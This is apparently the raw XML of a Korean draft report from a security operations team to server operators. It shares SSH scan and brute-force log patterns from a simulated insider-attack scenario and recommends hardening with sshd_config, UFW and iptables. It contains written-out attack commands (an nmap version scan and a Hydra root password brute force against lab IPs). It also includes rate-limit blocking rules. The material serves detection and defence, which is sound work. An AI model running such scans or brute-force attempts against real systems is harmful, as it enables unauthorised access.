
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="bmp" ContentType="image/bmp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[보안관제 대응 협조 요청 보고서 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>—</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> 로그 제출 및 차단 가이드] (초안)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문서 개요</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:widowControl w:val="off"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>문서명 : 보안관제 대응 협조 요청 보고서</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:widowControl w:val="off"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>작성부서 : 보안관제팀</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:widowControl w:val="off"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>작성자 : 김지원</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:widowControl w:val="off"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>배포대상 : 서버운영팀</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:widowControl w:val="off"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>목적 : 공격 시나리오 수행 시 발생하는 비정상 로그 패턴 공유 및 대응 협조 요청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1. 문서 목적</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:widowControl w:val="off"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>본 문서는 프로젝트 환경 내 보안관제 체계를 강화하기 위하여</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:widowControl w:val="off"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>공격 시나리오 검증 과정에서 확인된 비정상 로그 발생 사례 및 공격 유형을 공유하고,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:widowControl w:val="off"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>유사 로그 발생 시 서버운영팀에서</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:widowControl w:val="off"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>로그 수집 및 차단 조치를 수행할 수 있도록</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:widowControl w:val="off"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>로그 제출 기준</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:widowControl w:val="off"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>보안 정책 권고 사항</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:widowControl w:val="off"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>iptables 차단 가이드</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:widowControl w:val="off"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>를 제공하기 위해 작성되었습니다.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2. 서버운영팀 협조 요청 사항</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:widowControl w:val="off"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>다음과 같은 이상 행위 / 의심 트래픽이 발생할 경우,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:widowControl w:val="off"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>아래 로그를 함께 수집하여 보안관제팀으로 전달해 주시기 바랍니다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:widowControl w:val="off"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>웹 서버 접근 로그 (access.log)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:widowControl w:val="off"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>시스템 인증 로그 (auth.log / secure)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:widowControl w:val="off"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>방화벽 로그 (필요 시)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:widowControl w:val="off"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>※</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> 로그는 원본 파일 또는 캡처 화면 형태 모두 가능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3. 공격 시나리오별 비정상 로그 패턴 안내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시나리오 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>①</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:widowControl w:val="off"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>블루서버 인근 카페 네트워크</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:widowControl w:val="off"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>“퇴사자의 원한, 전산망을 마비시켜 복수하자!!!” 퇴사자 A씨와 고용된 해커는 이전 직장 근처 카페에서 공용 와이파이 및 네트워크 패킷 분석을 통해 내부망에 침투하고 시스템을 파괴하고자 한다.”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1) SSH 서비스 식별 및 접근 시도 (Nmap 스캔)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10.4.0.3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SSH 서비스 동작 여부 및 버전 확인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nmap -sV -p 22 10.4.0.3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4"/>
              </w:rPr>
              <w:t>tail -f /var/log/auth.log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195"/>
        <w:gridCol w:w="4195"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1176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inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5198745" cy="1328166"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="52" name="그림 %d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9b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745" cy="132816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76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/>
              <w:t>nmap -sV -p 22 10.4.0.3</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t># 우분투의 SSH 포트가 열려있는지 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1176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434213"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="53" name="그림 %d 5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9c.bmp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43421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496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/>
              <w:t>이 로그는</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>정상 접속자가 로그인 시도 중 실패한 패턴이 아니라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사용자 정보가 없음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비밀번호 실패 없음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세션 생성 시도 없음</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>라는 특징을 가짐</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>이는</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>서비스 버전 수집 / 포트 존재 확인 / 공격 사전 정찰 과정</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>에서 나타나는 전형적인 패턴이다.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1785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69820" cy="541020"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="54" name="그림 %d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9d.bmp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820" cy="54102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635000"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="55" name="그림 %d 5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9e.bmp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63500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56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/>
              <w:t>로그인 성공 패턴</w:t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/>
              <w:t>로그인 실패 패턴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tbl>
      <w:tblPr>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="91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919"/>
        <w:gridCol w:w="6264"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="963"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="918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8"/>
              </w:rPr>
              <w:t>1) SSH 보안 강화 (sshd_config 정책)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="963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1-1. root 직접 로그인 차단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sudo vim /etc/ssh/sshd_config =&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>PermitRootLogin no</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="963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root 바로 로그인 금지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일반 계정 </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>→</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> sudo 승격만 허용</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>운영 효과</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>�</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>�</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> root 계정 탈취 위험 감소</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="963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1-2. 비밀번호 로그인 금지 </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>→</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> 공개키 인증 전환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PasswordAuthentication no</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>PubkeyAuthentication yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="963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무차별 대입(Brute Force) 원천 차단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키 파일 가진 사용자만 접속 가능</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>운영 영향</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>⚠</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> 키 분실 대비 계정 복구 프로세스 필요</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="963"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="918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8"/>
              </w:rPr>
              <w:t>2) UFW 로 SSH 접근 IP 제한(추천)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="963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2-1. 특정 IP만 SSH 허용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sudo ufw allow from (특정 IP) to any port 22 proto tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="256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관리망 / 점프서버에서만 접속 허용</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1264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2-2. 나머지 모든 SSH 접속 차단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sudo ufw deny 22 =&gt; sudo ufw enable(UFW활성화)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>sudo ufw status verbose(상태 확인)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1216"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="918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�</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>�</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> 권장 운영 구조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외부 접속 </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>❌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Bastion Host(관리용 서버) </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>⭕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내부 관리자만 접속 </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>⭕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91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919"/>
        <w:gridCol w:w="6264"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="624"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="918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8"/>
              </w:rPr>
              <w:t>3) iptables 로 스캔 / 브루트포스 차단</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2536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3-1. SSH 접속 5회 이상 실패 시 차단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1.첫번째 규칙</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>iptables -A INPUT -p tcp --dport 22 -m state --state NEW -m recent --set --name SSH</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>2. 두 번째 규칙</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>iptables -A INPUT -p tcp --dport 22 -m state --state NEW -m recent --update --seconds 60 --hitcount 5 --rttl --name SSH -j DROP</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
              <w:rPr/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="624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60초 안에 5회 이상 접속 시도 </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>→</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> 차단</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>= 브루트포스 방어</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1536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첫 번째 규칙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옵션</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:rPr/>
              <w:t xml:space="preserve">                             의미</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>--dport 22</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:rPr/>
              <w:t xml:space="preserve">         SSH 포트 접근에 대해</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>--state NEW</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:rPr/>
              <w:t xml:space="preserve">         새 연결 시도일 때만</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>-m recent --set</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:rPr/>
              <w:t xml:space="preserve"> 접속 기록을 메모리에 저장</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>--name SSH</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:rPr/>
              <w:t xml:space="preserve">       SSH라는 이름으로 접속 이력 관리</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1856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두 번째 규칙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조건</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:rPr/>
              <w:t xml:space="preserve">                          의미</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>--seconds 60</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:rPr/>
              <w:t xml:space="preserve">            최근 60초 동안</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>--hitcount 5</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:rPr/>
              <w:t xml:space="preserve">         5회 이상 접속 시도하면</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>--rttl</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:rPr/>
              <w:t xml:space="preserve">             동일한 TTL일 때 (위장 스캔 방지)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>--update</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:rPr/>
              <w:t xml:space="preserve">          기록된 IP 기준으로 체크</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>-j DROP</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:rPr/>
              <w:t xml:space="preserve">             해당 IP 패킷 버림]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1536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3-2. 비정상 스캔(짧은 연결 반복) 차단 예시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iptables -A INPUT -p tcp --dport 22 -m recent --name SCAN --set</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>iptables -A INPUT -p tcp --dport 22 -m recent --name SCAN --update --seconds 10 --hitcount 10 -j DROP</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
              <w:rPr/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="596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짧은 시간 반복 세션 생성 </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>→</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> 스캐닝으로 간주 차단</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>= Connection closed by 반복 패턴 대응</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1326"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="291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3-3. 규칙 저장</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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Ubuntu / Debian</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>iptables-save &gt; /etc/iptables/rules.v4</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Rocky / RHEL 계열</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>service iptables save</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2176"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="918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외부에서 SSH 포트 정찰 및 비정상 접속 패턴이 확인됨에 따라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SSH 보안 강화를 위해 다음 정책 적용을 권고함.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①</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> root 원격 로그인 차단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  <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> 패스워드 로그인 금지 및 공개키 인증 전환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③</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> SSH 접속 출발지 IP 제한 (관리망만 허용)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④</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> 브루트포스 및 스캐닝 반복 시 자동 차단 규칙 적용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⑤</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> SSH 접속 로그 중앙 수집 및 관제 연계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2) SSH 무차별 대입(Brute Force) 공격 시도 (Hydra)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10.4.0.3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SSH 계정 비밀번호 무차별 대입을 통해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관리자(root) 계정 인증 정보 탈취 및 원격 접속 시도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hydra -l root -P /root/test.txt 10.4.0.3 ssh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4"/>
              </w:rPr>
              <w:t>tail -f /var/log/auth.log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195"/>
        <w:gridCol w:w="4195"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1176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50993" cy="1389380"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="56" name="그림 %d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9f.bmp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993" cy="138938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667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hydra -l root -P /root/test.txt 10.4.0.3 ssh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# root 계정 비밀번호 탈취(Brute Force)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="576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4" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1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-6623558</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="5198364" cy="3494532"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="57" name="그림 %d 5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0.bmp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349453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722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/>
              <w:t>해당 로그에서는 동일 IP(10.4.0.4)에서 root 계정을 대상으로</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>짧은 시간 동안 대량의 SSH 인증 실패가 반복적으로 발생하였으며,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>일부 구간에서는 동시 연결 과다로 MaxStartups throttling 로그가 확인되었다.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>이는 정상 사용자 로그인 패턴과 상이한 무차별 대입(Brute Force) 공격 시도의 전형적인 특징으로,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>자동화 도구(Hydra)에 의해 반복적인 비밀번호 대입이 수행된 비정상 접근 행위로 판단된다.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2351"/>
        </w:trPr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380746"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="58" name="그림 %d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1.bmp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38074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특징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1회가 아닌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매우 짧은 간격으로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연속 로그인 시도 발생</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>�</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>�</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> 정상 사용자의 실수 입력 패턴과 명확히 다름</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1898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/>
              <w:t>�</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>�</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> 결론 (비정상 행위 판단 사유)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동일 IP에서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짧은 시간에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root 계정에 대해</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>✔</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> 다수의 인증 실패 + 반복 접속 재시도</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>이는</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>무작위 비밀번호 대입을 통한 SSH Brute Force 공격 패턴</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>으로 감지됨.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3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36"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1127"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="83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3d7d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�</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>�</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> 적용해야 하는 보안 정책 (공통 대응)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2046"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="83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</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>①</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> SSH 자체 보안 강화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1. root 원격 로그인 차단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2. 패스워드 로그인 금지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3. 공개키 인증만 허용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4. SSH 포트 변경(보조적</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="617"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="83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②</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> 접근 가능한 IP 제한</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="844"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="83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2"/>
              </w:rPr>
              <w:t xml:space="preserve">UFW </w:t>
            </w:r>
